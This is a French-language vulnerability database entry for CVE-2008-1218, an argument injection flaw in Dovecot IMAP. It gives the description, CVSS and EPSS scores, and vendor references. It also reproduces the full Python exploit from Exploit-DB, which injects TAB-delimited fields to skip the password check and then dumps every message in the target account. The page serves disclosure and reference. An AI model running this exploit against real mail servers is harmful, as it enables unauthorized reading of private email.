CVE-2008-1218 : Détail

CVE-2008-1218

A07-Identif. and Authent. Fail
16.66%V4
Network
2008-03-10
22h00 +00:00
2018-10-11
17h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Argument injection vulnerability in Dovecot 1.0.x before 1.0.13, and 1.1.x before 1.1.rc3, when using blocking passdbs, allows remote attackers to bypass the password check via a password containing TAB characters, which are treated as argument delimiters that enable the skip_password_check field to be specified.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-255 Category : Credentials Management Errors
Weaknesses in this category are related to the management of credentials.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 6.8 AV:N/AC:M/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 5257

Date de publication : 2008-03-13 23h00 +00:00
Auteur : kingcope
EDB Vérifié : Yes

#lame Dovecot IMAP [1.0.10 -> 1.1rc3] Exploit #Here's an exploit for the recent TAB vulnerability in Dovecot. #It's nothing special since in the wild there are few to none #targets because of the special option which has to be set. #see CVE Entry CVE-2008-1218 #Exploit written by Kingcope import sys import imaplib print "Dovecot IMAP [1.0.10 -> 1.1rc2] Exploit" print "Prints out all E-Mails for any account if special configuration option is set" print "Exploit written by kingcope\n" if len(sys.argv)<3: print "usage: %s <hostname/ip address> <account> [-nossl]" % sys.argv[0] exit(0); if len(sys.argv)>3 and sys.argv[3] == "-nossl": M = imaplib.IMAP4(sys.argv[1]) else: M = imaplib.IMAP4_SSL(sys.argv[1]) M.login(sys.argv[2], "\"\tmaster_user=root\tskip_password_check=1\""); M.select() print "login succeeded." typ, data = M.search(None, 'ALL') k=0 for num in data[0].split(): typ, data = M.fetch(num, '(RFC822)') print 'Message %s\n%s\n' % (num, data[0][1]) k=k+1 M.close() M.logout() print "Messages read: %s" % k # milw0rm.com [2008-03-14]

Products Mentioned

Configuraton 0

Dovecot>>Dovecot >> Version To (including) 1.0.12

Dovecot>>Dovecot >> Version To (including) 1.1

    Références

    http://security.gentoo.org/glsa/glsa-200803-25.xml
    Tags : vendor-advisory, x_refsource_GENTOO
    http://secunia.com/advisories/29295
    Tags : third-party-advisory, x_refsource_SECUNIA
    https://www.exploit-db.com/exploits/5257
    Tags : exploit, x_refsource_EXPLOIT-DB
    http://secunia.com/advisories/29557
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://www.debian.org/security/2008/dsa-1516
    Tags : vendor-advisory, x_refsource_DEBIAN
    https://usn.ubuntu.com/593-1/
    Tags : vendor-advisory, x_refsource_UBUNTU
    http://secunia.com/advisories/29364
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://secunia.com/advisories/29226
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://secunia.com/advisories/32151
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://secunia.com/advisories/29385
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://www.securityfocus.com/bid/28181
    Tags : vdb-entry, x_refsource_BID
    http://secunia.com/advisories/29396
    Tags : third-party-advisory, x_refsource_SECUNIA